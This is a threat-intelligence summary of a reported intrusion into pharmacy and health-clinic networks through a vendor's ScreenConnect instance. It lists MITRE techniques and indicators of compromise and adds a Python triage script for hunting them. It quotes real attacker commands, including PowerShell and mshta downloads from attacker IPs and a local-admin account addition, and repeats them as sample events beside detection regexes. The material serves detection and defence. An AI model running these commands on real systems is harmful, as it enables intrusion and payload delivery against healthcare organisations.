Bitter Pill: Third-Party Pharmaceutical Vendor Linked to Pharmacy and Health Clinic Cyberattack

Unauthorized access activity in healthcare networks leveraged a locally hosted ScreenConnect remote access tool for initial access and persistence; the attackers then installed additional remote access tools (further ScreenConnect instances and AnyDesk) on two endpoints. The campaign involved multiple ScreenConnect instances, PowerShell download cradles, hands-on actions on each endpoint, and several IoCs; healthcare organizations should urgently hunt for these indicators and tighten monitoring of remote access tooling. #ScreenConnect #AnyDesk #Outcomes #TransactionDataSystems #Rx30 #ComputerRx

Keypoints

  • Attackers abused a locally hosted ScreenConnect instance used by Transaction Data Systems (Outcomes) to access victim healthcare organizations.
  • Additional remote access tools (ScreenConnect or AnyDesk) were installed to ensure persistent access across endpoints.
  • Four ScreenConnect instances were observed across two endpoints; one instance was used on both, and the accounts tied to the access are redacted in the report.
  • PowerShell commands downloaded and executed payloads (test.xml and a.msi), loading a Metasploit Meterpreter payload in memory and abusing legitimate Windows binaries (for example mshta) for execution.
  • Endpoint 2 saw the creation of an AnyDesk MSI service and a new administrator-level user, followed by further activity with other payloads (s.msi, b.msi) and tool usage.
  • IoCs include four IP addresses, a domain tied to the vendor (rs.tdsclinical.com), SHA256 hashes for test.xml and a.msi, and the additional payload names s.msi and b.msi.

MITRE Techniques

  • [T1219] Remote Access Software – The attackers installed additional remote access tools such as ScreenConnect or AnyDesk to ensure persistent access to the environments. “installing additional remote access tools such as ScreenConnect or AnyDesk instances, to ensure persistent access to the environments.”
  • [T1133] External Remote Services – The activity relies on a locally hosted ScreenConnect instance used for initial access to victim organizations. “The attackers abused a locally hosted instance of a widely-used remote access tool, ScreenConnect—utilized by the company Transaction Data Systems … for initial access to victim organizations.”
  • [T1059.001] PowerShell – The attackers used PowerShell commands to download and execute payloads. “powershell -command & { (New-Object Net.WebClient).DownloadFile('http://2.57.149[.]103/a.msi', 'C:\Users\Administrator\Documents\a.msi') }”
  • [T1105] Ingress Tool Transfer – The PowerShell commands download payloads from remote servers (a.msi, test.xml). “DownloadFile(…)”
  • [T1218.005] Mshta – Execution via mshta to run payloads (e.g., mshta http://119.91.138[.]133:9999/5E1Ch). “mshta http://119.91.138[.]133:9999/5E1Ch”
  • [T1543.003] Windows Service – Installation of the AnyDeskMSI Service via MSI and subsequent service manipulation. “installing the ‘AnyDeskMSI Service’”
  • [T1136] Create Account – The threat actor attempted to create a new local account (“manager”) and add it to the local Administrators group. “create the ‘manager’ user account and add the account to the local Administrator group”
  • [T1018] Remote System Discovery – Get-ADComputer was used to enumerate domain-joined computers along with their IPv4 addresses, operating systems and last logon dates. “Get-ADComputer -Filter * -Properties * | Sort IPv4Address | FT Name, ipv4*, oper*, LastLogonDate -Autosize”
  • [T1046] Network Service Discovery – The presence of Masscan64.exe, a compiled build of the Masscan TCP port scanner, indicates network port scanning. “Masscan64.exe – a compiled version of the Masscan TCP port scanner.”

Indicators of Compromise

  • [IP Address] Network Observables – 119.91.138.133, 185.12.45.98, 45.66.230.146, 2.57.149.103
  • [Domain] Network Domain – rs.tdsclinical.com
  • [File Hash] test.xml – SHA256: 9f42bf3a61faaab8f86abb3c7f9db417bffb3474a55169a4efb1d2386545e4e8; a.msi – SHA256: 70f865a7f8a01356685b17abdf6ac738e9a9098f1ae2d5a34cfa3610cb28fc56
  • [File Name] Payloads – test.xml, a.msi, s.msi, b.msi
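The following is an added hunting example, not code from the Huntress report: it turns the indicators above and the behaviours in the MITRE list into a small triage routine and runs it over constructed endpoint events (process command lines and one file-creation record, shaped loosely like EDR/Sysmon output; the event field names and the sample events are assumptions). It matches the atomic IoCs (IPs, domain, hashes, payload names) and the behavioural patterns (PowerShell download cradle, mshta fetching a URL, local Administrators membership change, Get-ADComputer enumeration, Masscan, the AnyDeskMSI service) so that an event like a benign PowerShell command produces no hit while the observed tradecraft does.

```python
"""Added example: triage endpoint events against the IoCs and behaviours above.

Not Huntress code. Event shape (id/host/cmdline/path/sha256/dst_ip/dst_host)
and the SAMPLE_EVENTS are constructed for illustration.
"""
import re
from typing import Dict, Iterable, List

# Atomic indicators taken from the summary above.
IOC_IPS = {"119.91.138.133", "185.12.45.98", "45.66.230.146", "2.57.149.103"}
IOC_DOMAINS = {"rs.tdsclinical.com"}
IOC_SHA256 = {
    "9f42bf3a61faaab8f86abb3c7f9db417bffb3474a55169a4efb1d2386545e4e8": "test.xml",
    "70f865a7f8a01356685b17abdf6ac738e9a9098f1ae2d5a34cfa3610cb28fc56": "a.msi",
}
IOC_FILENAMES = {"test.xml", "a.msi", "s.msi", "b.msi"}

# Behavioural rules: (label, regex over the command line). These generalise the
# exact commands quoted in the report to their common variants.
BEHAVIOUR_RULES = [
    ("T1059.001+T1105 PowerShell download cradle",
     re.compile(r"powershell.*?\b(?:DownloadFile|DownloadString|Invoke-WebRequest|"
                r"iwr|Start-BitsTransfer)\b.*?https?://", re.I | re.S)),
    ("T1218.005 mshta fetching a remote payload",
     re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I)),
    ("T1136 account added to local Administrators",
     re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add", re.I)),
    ("T1018 domain computer enumeration",
     re.compile(r"\bGet-ADComputer\b.*-Filter\s+\*", re.I)),
    ("T1046 masscan port scanner", re.compile(r"\bmasscan(?:64)?(?:\.exe)?\b", re.I)),
    ("T1543.003 AnyDesk MSI service install", re.compile(r"AnyDeskMSI Service", re.I)),
]

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def defang(indicator: str) -> str:
    """Bracket the last dot so a reported indicator is not clickable/resolvable."""
    head, sep, tail = indicator.rpartition(".")
    return f"{head}[.]{tail}" if sep else indicator


def triage_event(ev: Dict[str, str]) -> List[str]:
    """Return every reason this event matches; an empty list means no hit."""
    reasons: List[str] = []
    cmd = ev.get("cmdline", "")
    text = " ".join(filter(None, (cmd, ev.get("path", ""))))  # where filenames live

    for label, rx in BEHAVIOUR_RULES:
        if rx.search(cmd):
            reasons.append(label)

    # IPs embedded in the command line plus the recorded destination, if any.
    seen_ips = set(IPV4.findall(cmd))
    if ev.get("dst_ip"):
        seen_ips.add(ev["dst_ip"])
    for ip in sorted(seen_ips & IOC_IPS):
        reasons.append(f"IOC ip {defang(ip)}")

    for dom in sorted(IOC_DOMAINS):
        if dom in cmd.lower() or ev.get("dst_host", "").lower() == dom:
            reasons.append(f"IOC domain {defang(dom)}")

    sha = ev.get("sha256", "").lower()
    if sha in IOC_SHA256:
        reasons.append(f"IOC sha256 {sha[:12]}... ({IOC_SHA256[sha]})")

    # Payload names must stand alone (preceded by a path separator, quote or
    # space) so that e.g. 'data.msi' does not match 'a.msi'.
    for fname in sorted(IOC_FILENAMES):
        if re.search(r"(?:^|[\\/\s'\"])" + re.escape(fname) + r"(?![\w.])", text, re.I):
            reasons.append(f"IOC filename {fname}")
    return reasons


def triage(events: Iterable[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each matching event id to its reasons so hosts can be prioritised."""
    return {ev["id"]: r for ev in events if (r := triage_event(ev))}


# Constructed sample events (not from the report) mirroring the described activity.
SAMPLE_EVENTS = [
    {"id": "e1", "host": "ENDPOINT1", "dst_ip": "2.57.149.103",
     "cmdline": "powershell -command \"& { (New-Object Net.WebClient).DownloadFile("
                "'http://2.57.149.103/a.msi', 'C:\\Users\\Administrator\\Documents\\a.msi') }\""},
    {"id": "e2", "host": "ENDPOINT1", "dst_ip": "119.91.138.133",
     "cmdline": "mshta http://119.91.138.133:9999/5E1Ch"},
    {"id": "e3", "host": "ENDPOINT2", "path": "C:\\Users\\Administrator\\Documents\\a.msi",
     "sha256": "70F865A7F8A01356685B17ABDF6AC738E9A9098F1AE2D5A34CFA3610CB28FC56"},
    {"id": "e4", "host": "ENDPOINT2", "cmdline": "net localgroup administrators manager /add"},
    {"id": "e5", "host": "ENDPOINT2",
     "cmdline": "powershell Get-ADComputer -Filter * -Properties * | Sort IPv4Address "
                "| FT Name, ipv4*, oper*, LastLogonDate -Autosize"},
    {"id": "e6", "host": "ENDPOINT3",  # benign admin PowerShell: must not hit
     "cmdline": "powershell -command Get-Process | Where-Object { $_.CPU -gt 100 }"},
]

if __name__ == "__main__":
    for event_id, why in triage(SAMPLE_EVENTS).items():
        print(event_id, "->", "; ".join(why))
```

The behavioural rules are deliberately broader than the exact commands quoted in the report (any PowerShell web-download cmdlet, any `net localgroup administrators ... /add`), because the IP addresses and payload names will rotate long before the tradecraft does; the atomic IoCs are still checked so the specific campaign can be confirmed when they are present.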

Read more: https://www.huntress.com/blog/third-party-pharmaceutical-vendor-linked-to-pharmacy-and-health-clinic-cyberattack